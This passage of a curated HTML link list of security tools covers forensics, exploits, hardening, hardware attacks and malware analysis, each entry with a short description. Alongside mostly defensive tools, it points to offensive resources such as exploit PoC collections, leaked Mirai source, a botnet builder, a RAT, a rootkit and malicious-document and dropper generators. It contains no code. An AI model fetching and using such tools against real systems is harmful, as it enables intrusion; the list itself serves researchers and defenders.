<td><a href="https://github.com/swisscom/Invoke-Forensics">swisscom/Invoke-Forensics</a></td> <td>Invoke-Forensics provides PowerShell commands to simplify working with the forensic tools KAPE and RegRipper.</td> </tr> <tr> <td><a href="https://github.com/Sysinternals/SysmonForLinux">Sysinternals/SysmonForLinux</a></td> <td>Sysmon For Linux install and build instructions</td> </tr> <tr> <td><a href="https://github.com/tclahr/uac">tclahr/uac</a></td> <td>UAC (Unix-like Artifacts Collector) is a Live Response collection tool for Incident Reponse that makes use of built-in tools to automate the collection of Unix-like systems artifacts. Supported systems: AIX, FreeBSD, Linux, macOS, NetBSD, Netscaler, OpenBSD and Solaris.</td> </tr> <tr> <td><a href="https://github.com/telekom-security/acquire-aws-ec2">telekom-security/acquire-aws-ec2</a></td> <td>A python script to acquire multiple aws ec2 instances in a forensically sound-ish way</td> </tr> <tr> <td><a href="https://www.cgsecurity.org/wiki/TestDisk">TestDisk</a></td> <td>TestDisk is powerful free data recovery software! It was primarily designed to help recover lost partitions and/or make non-booting disks bootable again when these symptoms are caused by faulty software: certain types of viruses or human error (such as accidentally deleting a Partition Table). Partition table recovery using TestDisk is really easy.</td> </tr> <tr> <td><a href="https://www.sleuthkit.org/">The Sleuth Kit</a></td> <td>sleuthkit.org is the official website for The Sleuth Kit®, Autopsy®, and other open source digital investigation tools. From here, you can find documents, case studies, and download the latest versions of the software.</td> </tr> <tr> <td><a href="https://github.com/thewhiteninja/ntfstool">thewhiteninja/ntfstool</a></td> <td>Forensics tool for NTFS (parser, mft, bitlocker, deleted files)</td> </tr> <tr> <td><a href="https://github.com/THIBER-ORG/userline">THIBER-ORG/userline</a></td> <td>Query and report user logons relations from MS Windows Security Events</td> </tr> <tr> <td><a href="https://github.com/threathunters-io/laurel">threathunters-io/laurel</a></td> <td>Transform Linux Audit logs for SIEM usage</td> </tr> <tr> <td><a href="https://github.com/TobySalusky/cont3xt">TobySalusky/cont3xt</a></td> <td>Cont3xt intends to centralize and simplify a structured approach to gathering contextual intelligence in support of technical investigations.</td> </tr> <tr> <td><a href="https://github.com/trustedsec/SysmonCommunityGuide">trustedsec/SysmonCommunityGuide</a></td> <td>TrustedSec Sysinternals Sysmon Community Guide</td> </tr> <tr> <td><a href="https://github.com/ufrisk/LeechCore">ufrisk/LeechCore</a></td> <td>LeechCore - Physical Memory Acquisition Library & The LeechAgent Remote Memory Acquisition Agent</td> </tr> <tr> <td><a href="https://uncoder.io">Uncoder.io</a></td> <td>Uncoder.IO is the online translator for SIEM saved searches, filters, queries, API requests, correlation and Sigma rules to help SOC Analysts, Threat Hunters and SIEM Engineers</td> </tr> <tr> <td><a href="https://binaryforay.blogspot.com/2018/09/introducing-vscmount.html">VSCMount</a></td> <td>Volume shadow copies mounter tool</td> </tr> <tr> <td><a href="https://wazuh.com/">Wazuh</a></td> <td>Open Source Host and Endpoint Security</td> </tr> <tr> <td><a href="https://github.com/wagga40/Zircolite">wagga40/Zircolite</a></td> <td>A standalone SIGMA-based detection tool for EVTX.</td> </tr> <tr> <td><a href="https://github.com/williballenthin/EVTXtract">williballenthin/EVTXtract</a></td> <td>EVTXtract recovers and reconstructs fragments of EVTX log files from raw binary data, including unallocated space and memory images.</td> </tr> <tr> <td><a href="https://github.com/williballenthin/INDXParse">williballenthin/INDXParse</a></td> <td>Tool suite for inspecting NTFS artifacts</td> </tr> <tr> <td><a href="https://github.com/williballenthin/process-forest">williballenthin/process-forest</a></td> <td>process-forest is a tool that processes Microsoft Windows EVTX event logs that contain process accounting events and reconstructs the historical process heirarchies.</td> </tr> <tr> <td><a href="https://github.com/XForceIR/SideLoadHunter">XForceIR/SideLoadHunter</a></td> <td>SideLoadHunter is a PowerShell script and Sysmon configuration designed to aide defenders and incident responders identify evidence of DLL sideloading on Windows systems.</td> </tr> <tr> <td><a href="https://github.com/yampelo/beagle">yampelo/beagle</a></td> <td>Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs.</td> </tr> <tr> <td><a href="https://github.com/zeronetworks/RPCFirewall">zeronetworks/RPCFirewall</a></td> <td>RPC is the underlying mechanism which is used for numerous lateral movement techniques, reconnaisense, relay attacks, or simply to exploit vulnerable RPC services.</td> </tr> <tr> <td><a href="https://github.com/zodiacon/ProcMonXv2">zodiacon/ProcMonXv2</a></td> <td>Procmon-like tool that uses Event Tracing for Windows (ETW) instead of a kernel driver to provide event information.</td> </tr> </table> ## Exploits <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/externalist/exploit_playground">externalist/exploit_playground</a></td> <td>Analysis of public exploits or my 1day exploits</td> </tr> <tr> <td><a href="https://github.com/FriendsOfPHP/security-advisories">FriendsOfPHP/security-advisories</a></td> <td>The PHP Security Advisories Database references known security vulnerabilities in various PHP projects and libraries. This database must not serve as the primary source of information for security issues, it is not authoritative for any referenced software, but it allows to centralize information for convenience and easy consumption.</td> </tr> <tr> <td><a href="https://github.com/gellin/TeamViewer_Permissions_Hook_V1">gellin/TeamViewer_Permissions_Hook_V1</a></td> <td>A proof of concept injectable C++ dll, that uses naked inline hooking and direct memory modification to change your TeamViewer permissions.</td> </tr> <tr> <td><a href="https://github.com/HASecuritySolutions/VulnWhisperer">HASecuritySolutions/VulnWhisperer</a></td> <td>Create actionable data from your Vulnerability Scans</td> </tr> <tr> <td><a href="https://github.com/hasherezade/process_doppelganging">hasherezade/process_doppelganging</a></td> <td>My implementation of enSilo's Process Doppelganging (PE injection technique)</td> </tr> <tr> <td><a href="https://github.com/itm4n/Perfusion">itm4n/Perfusion</a></td> <td>Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)</td> </tr> <tr> <td><a href="https://github.com/itm4n/UsoDllLoader">itm4n/UsoDllLoader</a></td> <td>Windows - Weaponizing privileged file writes with the Update Session Orchestrator service</td> </tr> <tr> <td><a href="https://github.com/jollheef/out-of-tree">jollheef/out-of-tree</a></td> <td>out-of-tree kernel {module, exploit} development tool</td> </tr> <tr> <td><a href="https://github.com/nomi-sec/PoC-in-GitHub">nomi-sec/PoC-in-GitHub</a></td> <td>📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.</td> </tr> <tr> <td><a href="https://github.com/opencve/opencve">opencve/opencve</a></td> <td>CVE Alerting Platform</td> </tr> <tr> <td><a href="https://github.com/ScottyBauer/Android_Kernel_CVE_POCs">ScottyBauer/Android_Kernel_CVE_POCs</a></td> <td>A list of my CVE's with POCs</td> </tr> <tr> <td><a href="https://github.com/smgorelik/Windows-RCE-exploits">smgorelik/Windows-RCE-exploits</a></td> <td>The exploit samples database is a repository for **RCE** (remote code execution) exploits and Proof-of-Concepts for **WINDOWS**, the samples are uploaded for education purposes for red and blue teams.</td> </tr> <tr> <td><a href="https://github.com/Spajed/processrefund">Spajed/processrefund</a></td> <td>An attempt at Process Doppelgänging</td> </tr> <tr> <td><a href="https://github.com/spencerdodd/kernelpop">spencerdodd/kernelpop</a></td> <td>Kernel privilege escalation enumeration and exploitation framework</td> </tr> <tr> <td><a href="https://github.com/tunz/js-vuln-db">tunz/js-vuln-db</a></td> <td>A collection of JavaScript engine CVEs with PoCs</td> </tr> <tr> <td><a href="https://github.com/victims/victims-cve-db">victims/victims-cve-db</a></td> <td>This database contains information regarding CVE(s) that affect various language modules. We currently store version information corresponding to respective modules as understood by select sources.</td> </tr> <tr> <td><a href="https://github.com/VulnReproduction/LinuxFlaw">VulnReproduction/LinuxFlaw</a></td> <td>This repo records all the vulnerabilities of linux software I have reproduced in my local workspace</td> </tr> <tr> <td><a href="https://github.com/xairy/kernel-exploits">xairy/kernel-exploits</a></td> <td>A bunch of proof-of-concept exploits for the Linux kernel</td> </tr> </table> ## Hardening <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://hub.steampipe.io/mods/turbot/azure_compliance/controls/benchmark.nist_sp_800_53_rev_5">Benchmark: NIST SP 800-53 Revision 5</a></td> <td>NIST SP 800-53 Revision 5 represents a multi-year effort to develop the next generation of security and privacy controls needed to strengthen and support the U.S. federal government. These next generation controls offer a proactive and systematic approach to ensure that critical systems, components, and services are sufficiently trustworthy and have the necessary resilience to defend the economic and national security interests of the United States.</td> </tr> <tr> <td><a href="https://github.com/cisagov/cset">cisagov/cset</a></td> <td>Cybersecurity Evaluation Tool</td> </tr> <tr> <td><a href="https://linuxreviews.org/Linux_Kernel_Runtime_Guard">Linux Kernel Runtime Guard</a></td> <td>Linux Kernel Runtime Guard (LKRG) is a out-of-tree security module for the Linux kernel developed by Openwall. It does run-time integrity checks in order to stop known, and unknown, security vulnerabilities in the Linux kernel. It can log detected intrusion attempts or stop them by causing a kernel panic - resulting in a frozen machine or a reboot depending on how the kernel is configured.</td> </tr> <tr> <td><a href="https://github.com/nccgroup/exploit_mitigations">nccgroup/exploit_mitigations</a></td> <td>Knowledge base of exploit mitigations available across numerous operating systems, architectures and applications and versions.</td> </tr> <tr> <td><a href="https://public.cyber.mil/stigs/">Security Technical Implementation Guides (STIGs)</a></td> <td>The Security Technical Implementation Guides (STIGs) are the configuration standards for DOD IA and IA-enabled devices/systems.</td> </tr> <tr> <td><a href="https://github.com/securitywithoutborders/hardentools"></a>securitywithoutborders/hardentools</td> <td>Hardentools simply reduces the attack surface on Microsoft Windows computers by disabling low-hanging fruit risky features.</td> </tr> <tr> <td><a href="https://www.asd.gov.au/infosec/mitigationstrategies.htm">Strategies to Mitigate Cyber Security Incidents</a></td> <td>The Australian Signals Directorate (ASD) has developed prioritised mitigation strategies to help technical cyber security professionals in all organisations mitigate cyber security incidents. This guidance addresses targeted cyber intrusions, ransomware and external adversaries with destructive intent, malicious insiders, 'business email compromise' and industrial control systems.</td> </tr> <tr> <td><a href="https://github.com/ukncsc/Device-Security-Guidance-Configuration-Packs">ukncsc/Device-Security-Guidance-Configuration-Packs</a></td> <td>This repository contains policy packs which can be used by system management software to configure device platforms (such as Windows 10 and iOS) in accordance with NCSC device security guidance. These configurations are aimed primarily at government and other medium/large organisations.</td> </tr> <tr> <td><a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-security-baselines">Windows Security Baseline</a></td> <td>A security baseline is a group of Microsoft-recommended configuration settings that explains their security impact. These settings are based on feedback from Microsoft security engineering teams, product groups, partners, and customers.</td> </tr> </table> ## Hardware <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/tothi/usbgadget-tool">tothi/usbgadget-tool</a></td> <td>Dumb USB HID gadget creator for Android (for triggering device driver install on Windows for LPE)</td> </tr> <tr> <td><a href="https://github.com/ufrisk/pcileech">ufrisk/pcileech</a></td> <td>Direct Memory Access (DMA) Attack Software</td> </tr> </table> ## Malware Analysis <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/accidentalrebel/mbcscan">accidentalrebel/mbcscan</a></td> <td>Scans a malware file and lists down the related MBC (Malware Behavior Catalog) details.</td> </tr> <tr> <td><a href="https://github.com/activecm/rita">activecm/rita</a></td> <td> Real Intelligence Threat Analytics</td> </tr> <tr> <td><a href="https://github.com/adamkramer/rapid_env">adamkramer/rapid_env</a></td> <td>Rapid deployment of Windows environment (files, registry keys, mutex etc) to facilitate malware analysis</td> </tr> <tr> <td><a href="https://github.com/advanced-threat-research/DarkSide-Config-Extract">advanced-threat-research/DarkSide-Config-Extract</a></td> <td>DarkSide & BlackMatter Config Extractor by ValthekOn & S2 (@sisoma2)</td> </tr> <tr> <td><a href="https://github.com/advanced-threat-research/IOCs">advanced-threat-research/IOCs</a></td> <td>Repository containing IOCs, MISP and Expert rules from our blogs</td> </tr> <tr> <td><a href="https://github.com/akamai/luda">akamai/luda</a></td> <td>Malicious actors often reuse code to deploy their malware, phishing website or CNC server. As a result, similiaries can be found on URLs path by inspecting internet traffic. Moreover, deep learning models or even regular ML model do not fit for inline deployment in terms of running performance. However, regexes ( or YARA rules ) can be deployed …</td> </tr> <tr> <td><a href="https://github.com/alexandreborges/malwoverview">alexandreborges/malwoverview</a></td> <td>Malwoverview.py is a simple tool to perform an initial and quick triage on either a directory containing malware samples or a specific malware sample</td> </tr> <tr> <td><a href="https://cse.google.com/cse/publicurl?cx=003248445720253387346:turlh5vi4xc">APT Groups, Operations and Malware Search Engine</td> <td>APT Groups, Operations and Malware Search Engine</td> </tr> <tr> <td><a href="https://github.com/ashishb/android-malware">ashishb/android-malware</a></td> <td>Collection of android malware samples</td> </tr> <tr> <td><a href="https://avcaesar.malware.lu/">AVCaesar</a></td> <td>AVCaesar is a malware analysis engine and repository</td> </tr> <tr> <td><a href="https://github.com/blackorbird/APT_REPORT">blackorbird/APT_REPORT</a></td> <td>Interesting apt report collection and some special ioc express</td> </tr> <tr> <td><a href="https://github.com/CapacitorSet/box-js">CapacitorSet/box-js</a></td> <td>A tool for studying JavaScript malware</td> </tr> <tr> <td><a href="https://github.com/captainGeech42/ransomwatch">captainGeech42/ransomwatch</a></td> <td>Ransomware leak site monitoring</td> </tr> <tr> <td><a href="https://github.com/CERT-Polska/drakvuf-sandbox">CERT-Polska/drakvuf-sandbox</a></td> <td>DRAKVUF Sandbox - automated hypervisor-level malware analysis system</td> </tr> <tr> <td><a href="https://github.com/CERT-Polska/karton/">CERT-Polska/karton</a></td> <td>Distributed malware processing framework based on Python, Redis and MinIO.</td> </tr> <tr> <td><a href="https://github.com/CERT-Polska/mwdb-core">CERT-Polska/mwdb-core</a></td> <td>Malware repository component for samples & static configuration with REST API interface.</td> </tr> <tr> <td><a href="https://github.com/CheckPointSW/showstopper">CheckPointSW/showstopper</a></td> <td>ShowStopper is a tool for helping malware researchers explore and test anti-debug techniques or verify debugger plugins or other solutions that clash with standard anti-debug methods.</td> </tr> <tr> <td><a href="http://contagiodump.blogspot.com/">Contagio</a></td> <td>Malwarre dump</td> </tr> <tr> <td><a href="https://github.com/CRED-CLUB/ARTIF">CRED-CLUB/ARTIF</a></td> <td>An advanced real time threat intelligence framework to identify threats and malicious web traffic on the basis of IP reputation and historical data.</td> </tr> <tr> <td><a href="https://github.com/CriticalPathSecurity/Zeek-Intelligence-Feeds">CriticalPathSecurity/Zeek-Intelligence-Feeds</a></td> <td>Zeek-Formatted Threat Intelligence Feeds</td> </tr> <tr> <td><a href="https://github.com/cmu-sei/cyobstract">cmu-sei/cyobstract</a></td> <td>A tool to extract structured cyber information from incident reports.</td> </tr> <tr> <td><a href="https://crxcavator.io/">CRXcavator</a></td> <td>CRXcavator automatically scans the entire Chrome Web Store every 3 hours and produces a quantified risk score for each Chrome Extension based on several factors.</td> </tr> <tr> <td><a href="https://github.com/countercept/snake">countercept/snake</a></td> <td>snake - a malware storage zoo</td> </tr> <tr> <td><a href="https://github.com/CybercentreCanada/CCCS-Yara">CybercentreCanada/CCCS-Yara</a></td> <td>YARA rule metadata specification and validation utility / Spécification et validation pour les règles YARA</td> </tr> <tr> <td><a href="https://github.com/D4stiny/spectre">D4stiny/spectre</a></td> <td>A Windows kernel-mode rootkit that abuses legitimate communication channels to control a machine.</td> </tr> <tr> <td><a href="http://dasmalwerk.eu/">DAS MALWERK</a></td> <td>DAS MALWERK - your one stop shop for fresh malware samples</td> </tr> <tr> <td><a href="https://github.com/DoctorWebLtd/malware-iocs">DoctorWebLtd/malware-iocs</a></td> <td>This repository contains Indicators of Compromise (IOCs) related to our investigations.</td> </tr> <tr> <td><a href="https://dragonfly.certego.net/">Dragonfly</a></td> <td>An automated sandbox to emulate and analyze malware</td> </tr> <tr> <td><a href="https://github.com/droidefense/engine">droidefense/engine</td> <td>Droidefense: Advance Android Malware Analysis Framework</td> </tr> <tr> <td><a href="https://github.com/dsnezhkov/racketeer">dsnezhkov/racketeer</a></td> <td>Racketeer Project - Ransomware emulation toolkit</td> </tr> <tr> <td><a href="https://github.com/ecstatic-nobel/Analyst-Arsenal">ecstatic-nobel/Analyst-Arsenal</a></td> <td>Phishing kits hunting</td> </tr> <tr> <td><a href="https://github.com/EFForg/yaya">EFForg/yaya</a></td> <td>Yet Another Yara Automaton - Automatically curate open source yara rules and run scans</td> </tr> <tr> <td><a href="https://github.com/eset/malware-ioc">eset/malware-ioc</a></td> <td>Indicators of Compromises (IOC) of our various investigations</td> </tr> <tr> <td><a href="https://certsocietegenerale.github.io/fame/">FAME</a></td> <td>FAME Automates Malware Evaluation</td> </tr> <tr> <td><a href="https://github.com/fireeye/flashmingo">fireeye/flashmingo</a></td> <td>Automatic analysis of SWF files based on some heuristics. Extensible via plugins.</td> </tr> <tr> <td><a href="https://github.com/fireeye/iocs">fireeye/iocs</a></td> <td>FireEye Publicly Shared Indicators of Compromise (IOCs)</td> </tr> <tr> <td><a href="https://github.com/felixweyne/imaginaryC2">felixweyne/imaginaryC2</a></td> <td>Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.</td> </tr> <tr> <td><a href="https://github.com/FortyNorthSecurity/WMImplant">FortyNorthSecurity/WMImplant</a></td> <td>This is a PowerShell based tool that is designed to act like a RAT. Its interface is that of a shell where any command that is supported is translated into a WMI-equivalent for use on a network/remote machine. WMImplant is WMI based.</td> </tr> <tr> <td><a href="https://github.com/godaddy/procfilter">godaddy/procfilter</a></td> <td>A YARA-integrated process denial framework for Windows</td> </tr> <tr> <td><a href="https://github.com/gen0cide/gscript">gen0cide/gscript</a></td> <td>Framework to rapidly implement custom droppers for all three major operating systems</td> </tr> <tr> <td><a href="https://github.com/glmcdona/Process-Dump">glmcdona/Process-Dump</a></td> <td>Windows tool for dumping malware PE files from memory back to disk for analysis.</td> </tr> <tr> <td><a href="https://github.com/google/vxsig">google/vxsig</a></td> <td>Automatically generate AV byte signatures from sets of similar binaries.</td> </tr> <tr> <td><a href="https://github.com/GoSecure/malboxes">GoSecure/malboxes</a></td> <td>Builds malware analysis Windows VMs so that you don't have to.</td> </tr> <tr> <td><a href="https://github.com/GreatSCT/GreatSCT">GreatSCT/GreatSCT</a></td> <td>The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team</td> </tr> <tr> <td><a href="https://haveibeenemotet.com">Have I Been Emotet</a></etd> <td>Check if your email address or domain is involved in the Emotet malspam ([email protected] or domain.ext). Your address can be marked as a SENDER (FAKE or REAL), as a RECIPIENT or any combination of the three.</td> </tr> <tr> <td><a href="https://github.com/hasherezade/libpeconv/tree/master/run_pe">hasherezade/libpeconv/runpe</a></td> <td>RunPE (aka Process Hollowing) is a well known technique allowing to injecting a new PE into a remote processes, imprersonating this process. The given implementation works for PE 32bit as well as 64bit.</td> </tr> <tr> <td><a href="https://github.com/hasherezade/mal_unpack">hasherezade/mal_unpack</a></td> <td>Dynamic unpacker based on PE-sieve</td> </tr> <tr> <td><a href="https://github.com/hasherezade/pe-sieve">hasherezade/pe-sieve</a></td> <td>Scans a given process, searching for the modules containing in-memory code modifications. When found, it dumps the modified PE.</td> </tr> <tr> <td><a href="https://tria.ge/">Hatching Triage</a></td> <td>Triage is our state-of-the-art malware analysis sandbox designed for cross-platform support (Windows, Android, Linux, and macOS), high-volume malware analysis capabilities, and configuration extraction for numerous malware families.</td> </tr> <tr> <td><a href="https://github.com/hegusung/AVSignSeek">hegusung/AVSignSeek</a></td> <td>Tool written in python3 to determine where the AV signature is located in a binary/payload</td> </tr> <tr> <td><a href="https://github.com/hejelylab/easeYARA">hejelylab/easeYARA</a></td> <td>C# Desktop GUI application that either performs YARA scan locally or prepares the scan in Active Directory domain environment with a few clicks.</td> </tr> </tr> <tr> <td><a href="https://github.com/hlldz/SpookFlare">hlldz/SpookFlare</a></td> <td>Loader, dropper generator with multiple features for bypassing client-side and network-side countermeasures.</td> </tr> <tr> <td><a href="https://www.hybrid-analysis.com/">Hybrid-Analysis</a></td> <td>Free Automated Malware Analysis Service</td> </tr> <tr> <td><a href="https://github.com/InQuest/ThreatIngestor">InQuest/ThreatIngestor</a></td> <td>An extendable tool to extract and aggregate IOCs from threat feeds.</td> </tr> <tr> <td><a href="https://github.com/fortinet/ips-bph-framework">ips-bph-framework</a></td> <td>BLACKPHENIX is an open source malware analysis automation framework composed of services, scripts, plug-ins, and tools and is based on a Command-and-Control (C&C) architecture</td> </tr> <tr> <td><a href="https://iris-h.malwageddon.com/">IRIS-H</a></td> <td>IRIS-H is an online digital forensics tool that performs automated static analysis of files stored in a directory-based or strictly structured formats.</td> </tr> <tr> <td><a href="https://github.com/jgamblin/Mirai-Source-Code">jgamblin/Mirai-Source-Code</a></td> <td>Leaked Mirai Source Code for Research/IoC Development Purposes.</td> </tr> <tr> <td><a href="https://github.com/JPCERTCC/MalConfScan">jgamblin/JPCERTCC/MalConfScan</a></td> <td>Volatility plugin for extracts configuration data of known malware</td> </tr> <tr> <td><a href="https://github.com/JohnHammond/vbe-decoder">JohnHammond/vbe-decoder</a></td> <td>A Python3 script to decode an encoded VBScript file, often seen with a .vbe file extension</td> </tr> <tr> <td><a href="https://github.com/JohnLaTwC/PyPowerShellXray">JohnLaTwC/PyPowerShellXray</a></td> <td>Python script to decode common encoded PowerShell scripts</td> </tr> <tr> <td><a href="https://github.com/jstrosch/malware-samples">jstrosch/malware-samples</a></td> <td>Malware samples, analysis exercises and other interesting resources.</td> </tr> <tr> <td><a href="https://github.com/KasperskyLab/klara">KasperskyLab/klara</a></td> <td>Klara project is aimed at helping Threat Intelligence researechers hunt for new malware using Yara.</td> </tr> <tr> <td><a href="https://github.com/katjahahn/PortEx">katjahahn/PortEx</a></td> <td>Java library to analyse Portable Executable files with a special focus on malware analysis and PE malformation robustness</td> </tr> <tr> <td><a href="https://github.com/kevoreilly/CAPEv2">kevoreilly/CAPEv2</a></td> <td>Malware Configuration And Payload Extraction</td> </tr> <tr> <td><a href="https://github.com/kirk-sayre-work/VBASeismograph">kirk-sayre-work/VBASeismograph</a></td> <td>A tool for detecting VBA stomping.</td> </tr> <tr> <td><a href="https://koodous.com">Koodous</a></td> <td>Koodous is a collaborative platform that combines the power of online analysis tools with social interactions between the analysts over a vast APKs repository.</td> </tr> <tr> <td><a href="https://github.com/LordNoteworthy/al-khaser">LordNoteworthy/al-khaser</a></td> <td>Public malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection.</td> </tr> <tr> <td><a href="https://objective-see.com/malware.html">Mac Malware</a></td> <td>Mac Malware by Objective-See</td> </tr> <tr> <td><a href="http://malc0de.com/database/">Malc0de database</a></td> <td>Malc0de database</td> </tr> <tr> <td><a href="https://github.com/mandiant/apooxml">mandiant/apooxml</a></td> <td>Generate YARA rules for OOXML documents.</td> </tr> <tr> <td><a href="https://github.com/marcosd4h/memhunter">marcosd4h/memhunter</a></td> <td>Live hunting of code injection techniques</td> </tr> <tr> <td><a href="https://github.com/maliceio/malice">maliceio/malice</a></td> <td>Malice's mission is to be a free open source version of VirusTotal that anyone can use at any scale from an independent researcher to a fortune 500 company.</td> </tr> <tr> <td><a href="https://malpedia.caad.fkie.fraunhofer.de/">Malpedia</a></td> <td>The primary goal of Malpedia is to provide a resource for rapid identification and actionable context when investigating malware. Openness to curated contributions shall ensure an accountable level of quality in order to foster meaningful and reproducible research.</td> </tr> <tr> <td><a href="https://malshare.com/">MalShare</a></td> <td>A free Malware repository providing researchers access to samples, malicous feeds, and Yara results</td> </tr> <tr> <td><a href="https://bazaar.abuse.ch/browse/">MalwareBazaar Database</a></td> <td>MalwareBazaar is a project operated by abuse.ch. The purpose of the project is to collect and share malware samples, helping IT-security researchers and threat analyst protecting their constituency and customers from cyber threats.</td> </tr> <tr> <td><a href="https://github.com/MalwareCantFly/Vba2Graph/">MalwareCantFly/Vba2Graph</a></td> <td>Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents.</td> </tr> <tr> <td><a href="https://github.com/malwaredllc/byob">malwaredllc/byob</a></td> <td>BYOB (Build Your Own Botnet)</td> </tr> <tr> <td><a href="https://github.com/malwareinfosec/EKFiddle">malwareinfosec/EKFiddle</a></td> <td>A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.</td> </tr> <tr> <td><a href="https://www.maltiverse.com/search">Malwaretiverse</a></td> <td>maltiverse - Connect the dots - The definitive IoC search engine</td> </tr> <tr> <td><a href="https://malwares.github.io/">Malwares</a></td> <td>Malware SRC Database</td> </tr> <tr> <td><a href="https://marcoramilli.com/malware/">Malware Static Analysis</a></td> <td>The following interface stands in front of a live engine which takes binary files and runs them against a pletora of hundreds YARA rules.</td> </tr> <tr> <td><a href="https://github.com/marcoramilli/PhishingKitTracker">marcoramilli/PhishingKitTracker</a></td> <td>An extensible and freshly updated collection of phishingkits for forensics and future analysis topped with simple stats</td> </tr> <tr> <td><a href="https://github.com/matterpreter/DefenderCheck">matterpreter/DefenderCheck</a></td> <td>Identifies the bytes that Microsoft Defender flags on.</td> </tr> <tr> <td><a href="https://github.com/mindcollapse/MalwareMultiScan">mindcollapse/MalwareMultiScan</a></td> <td>Self-hosted VirusTotal / MetaDefender wannabe with API, demo UI and Scanners running in Docker.</td> </tr> <tr> <td><a href="https://github.com/MinervaLabsResearch/Mystique">MinervaLabsResearch/Mystique</a></td> <td>Mystique may be used to discover infection markers that can be used to vaccinate endpoints against malware. It receives as input a malicious sample and automatically generates a list of mutexes that could be used to as "vaccines" against the sample</td> </tr> <tr> <td><a href="https://github.com/mitchellkrogza/Phishing.Database">mitchellkrogza/Phishing.Database</a></td> <td>Phishing Domains, urls websites and threats database. We use the PyFunceble testing tool to validate the status of all known Phishing domains and provide stats to reveal how many unique domains used for Phishing are still active</td> </tr> <tr> <td><a href="https://github.com/mohamedaymenkarmous/alienvault-otx-api-html">mohamedaymenkarmous/alienvault-otx-api-html</a></td> <td>AlienVault OTX API-based project with HTML (pure HTML or mixed PNG screenshots) reports pages that looks like the real AlienVault OTX website</td> </tr> <tr> <td><a href="https://github.com/NavyTitanium/Fake-Sandbox-Artifacts">NavyTitanium/Fake-Sandbox-Artifacts</a></td> <td>This script allows you to create various artifacts on a bare-metal Windows computer in an attempt to trick malwares that looks for VM or analysis tools</td> </tr> <tr> <td><a href="https://github.com/nbeede/BoomBox">nbeede/BoomBox</a></td> <td>Automatic deployment of Cuckoo Sandbox malware lab using Packer and Vagrant</td> </tr> <tr> <td><a href="https://github.com/nbulischeck/tyton">nbulischeck/tyton</a></td> <td>Linux Kernel-Mode Rootkit Hunter for 4.4.0-31+</td> </tr> <tr> <td><a href="https://github.com/Neo23x0/APTSimulator">Neo23x0/APTSimulator</a></td> <td>A toolset to make a system look as if it was the victim of an APT attack</td> </tr> <tr> <td><a href="https://github.com/Neo23x0/exotron">Neo23x0/exotron</a></td> <td>Sandbox feature upgrade with the help of wrapped samples</td> </tr> <tr> <td><a href="https://github.com/nsmfoo/antivmdetection">nsmfoo/antivmdetection</a></td> <td>Script to create templates to use with VirtualBox to make vm detection harder</td> </tr> <tr> <td><a href="https://github.com/ntddk/virustream">ntddk/virustream</a></td> <td>A script to track malware IOCs with OSINT on Twitter.</td> </tr> <tr> <td><a href="https://github.com/OALabs/BlobRunner">OALabs/BlobRunner</a></td> <td>Quickly debug shellcode extracted during malware analysis</td> </tr> <tr> <td><a href="https://github.com/OALabs/PyIATRebuild">OALabs/PyIATRebuild</a></td> <td>Automatically rebuild Import Address Table for dumped PE file. With python bindings!</td> </tr> <tr> <td><a href="https://github.com/oasis-open/cti-stix-generator">oasis-open/cti-stix-generator</a></td> <td>OASIS Cyber Threat Intelligence (CTI) TC: A tool for generating STIX content for prototyping and testing.</td> </tr> <tr> <td><a href="https://github.com/ohjeongwook/PowerShellRunBox">ohjeongwook/PowerShellRunBox</a></td> <td>Dynamic PowerShell analysis framework</td> </tr> <tr> <td><a href="https://github.com/outflanknl/EvilClippy">outflanknl/EvilClippy</a></td> <td>A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows.</td> </tr> <tr> <td><a href="https://github.com/P4T12ICK/ypsilon">P4T12ICK/ypsilon</a></td> <td>Ypsilon is an Automated Security Use Case Testing Environment using real malware to test SIEM use cases in an closed environment. Different tools such as Ansible, Cuckoo, VirtualBox, Splunk and ELK are combined to determine the quality of a SIEM use case by testing any number of malware against a SIEM use case. Finally, a test report is generated giving insight to the quality of an use case.</td> </tr> <tr> <td><a href="https://github.com/pan-unit42/iocs">pan-unit42/iocs</a></td> <td>Indicators from Unit 42 Public Reports</td> </tr> <tr> <td><a href="https://github.com/phage-nz/ph0neutria">phage-nz/ph0neutria</a></td> <td>ph0neutria is a malware zoo builder that sources samples straight from the wild. Everything is stored in Viper for ease of access and manageability.</td> </tr> <tr> <td><a href="https://github.com/PwCUK-CTO/rtfsig">PwCUK-CTO/rtfsig</a></td> <td>A tool to help malware analysts signature unique parts of RTF documents</td> </tr> <tr> <td><a href="https://github.com/InQuest/python-iocextract">python-iocextract</a></td> <td>Advanced Indicator of Compromise (IOC) extractor</td> </tr> <tr> <td><a href="https://github.com/quarkslab/irma">quarkslab/irma</a></td> <td>IRMA is an asynchronous & customizable analysis system for suspicious files.</td> </tr> <tr> <td><a href="https://github.com/quasar/QuasarRAT">quasar/QuasarRAT</a></td> <td>Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you.</td> </tr> <tr> <td><a href="https://github.com/rastrea2r/rastrea2r">rastrea2r/rastrea2r</a></td> <td>Collecting & Hunting for IOCs with gusto and style</td> </tr> <tr> <td><a href="https://github.com/SafeBreach-Labs/mkmalwarefrom">SafeBreach-Labs/mkmalwarefrom</a></td> 